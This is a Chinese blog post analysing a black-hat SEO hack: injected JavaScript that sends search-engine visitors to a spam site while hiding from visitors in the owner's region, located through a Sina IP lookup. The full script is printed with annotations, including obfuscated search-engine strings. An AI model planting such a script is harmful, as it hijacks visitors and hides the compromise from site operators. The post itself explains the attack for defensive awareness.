码迷,mamicode.com
首页 > 其他好文 > 详细

发现一波黒帽seo神操作,通过百度打开跳广告,其他方式访问正常。下面分析原理。

时间:2017-11-24 15:03:32      阅读:191      评论:0      收藏:0      [点我收藏+]

标签:初步   情况   rip   amp   当事人   nts   script   服务器安全   elements   

朋友网站被黑了,但是不是低级黑,虽然最后发现原理很简单,但是对于普通seo来说还是有些奇妙哦。而且不影响收录和排名,站长只管优化,黒帽偷偷得利!

情况是在百度打开收录的页面,打开后,会跳到别人的垃圾广告网站。

直接打开,或者在网站运营地区打开就是正常访问。

这波操作让当事人懵逼啊,只能靠客户反映。

我得知此事后初步判断是被植入了恶意代码加了判断。

在v站请教了大佬们后,得到了证实,还帮我找到了植入点,真是给力啊。

这是通过引入js来实现的。

下面我们来剖析下这技术简单但是微妙的操作吧。

当然这只是黒帽seo的冰山一角啦

(function() {
    var JSONP=document.createElement("script");  
    JSONP.type="text/javascript";  
    JSONP.src="http://int.dpool.sina.com.cn/iplookup/iplookup.php?format=js";  这里还用了新浪的api来判断城市
    document.getElementsByTagName("head")[0].appendChild(JSONP); 
    JSONP.onload = function() {    
        var provinces = [\u5c71\u4e1c];  山东、说明是不想让山东的运营发现
                var provinces1 = [\u6ed5\u5dde]; 滕州
        for(var i in provinces) {
            if(remote_ip_info.province != provinces[i] && remote_ip_info.city != provinces1[i]) { remote_ip_info这个是从新浪api得到的
                    excute(); 如果不是运营地区就跳广告
            }
        }
        
    }
    function excute() { 广告函数
        var ref=document.referrer; // referrer 方法用来判断上一个网页的url,没有返回null
            var ba="ba";   // 这个操作估计是为了不让搜索引擎发现吧
            ba = ba + "idu";
            var so="so";
            so = so + "gou";
            var s="s";
            s = s + "o";
            var go="go";
            go = s + "m";
            nam = "";
            if(ref.indexOf(ba)>0||ref.indexOf(so)>0||ref.indexOf(s)>0||ref.indexOf(go)>0) 判断是不是搜索引擎过来的
            {
            window.location.href="http://垃圾网站。com";   跳垃圾网站
            }
    }

})()

但是这种问题都是因为服务器安全不到位,被黑客获取权限,实施了恶意植入。

所以网站安全是非常主要的。

发现一波黒帽seo神操作,通过百度打开跳广告,其他方式访问正常。下面分析原理。

标签:初步   情况   rip   amp   当事人   nts   script   服务器安全   elements   

原文地址:http://www.cnblogs.com/norie/p/7889095.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!